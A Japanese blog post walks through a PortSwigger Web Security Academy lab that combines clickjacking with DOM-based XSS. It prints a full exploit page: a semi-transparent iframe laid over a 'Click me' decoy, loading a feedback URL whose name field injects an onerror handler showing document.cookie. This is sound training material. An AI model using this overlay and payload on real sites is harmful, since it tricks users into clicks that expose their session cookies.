Shikata Ga Nai

Private? There is no such things.

Exploiting clickjacking vulnerability to trigger DOM-based XSSをやってみた

Hello there, ('ω')ノ

 

クリックジャッキングの脆弱性を悪用してDOMベースのXSSをトリガーを。

このラボには、クリックでトリガーされるXSSの脆弱性があって。

 

まずは、入力から。

 

f:id:ThisIsOne:20210421201248p:plain

 

Nameにペイロードをしかけると脆弱性があることが確認できて。

 

f:id:ThisIsOne:20210421201307p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210421201355p:plain

 

次にメソッドをGETに変更して。

 

f:id:ThisIsOne:20210421201519p:plain

 

入力項目以外のパラメータを削除してSendしてみると。

正常なステータスが返ってきて。

 

f:id:ThisIsOne:20210421201630p:plain

 

 

エクスプロイトサーバに下記を挿入して。

透明度を変えてView exploitでクリックさせる位置を調整して。

 

<style>
iframe {
position:relative;
width:700px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:410px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe
src="https://acf21f361faa792280430ea300df00df.web-security-academy.net/feedback?name= src=1 onerror=alert(document.cookie)>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>

 

f:id:ThisIsOne:20210422080847p:plain

 

 

f:id:ThisIsOne:20210421202201p:plain

 

クリックしてみるとalertが起動することが確認できて。

 

f:id:ThisIsOne:20210421202521p:plain

 

最後にStoreして、Deliverするもののクリアはされず。

なんどもトライしてもクリアできず。

あきらかにクリアできているはずなのだが。

PortSwiggerに問い合わせると、どうやらクリックする位置で判断しているとか。

クリックする位置を微妙に調整するとクリアできた。

 

f:id:ThisIsOne:20210423112137p:plain

 

Best regards, (^^ゞ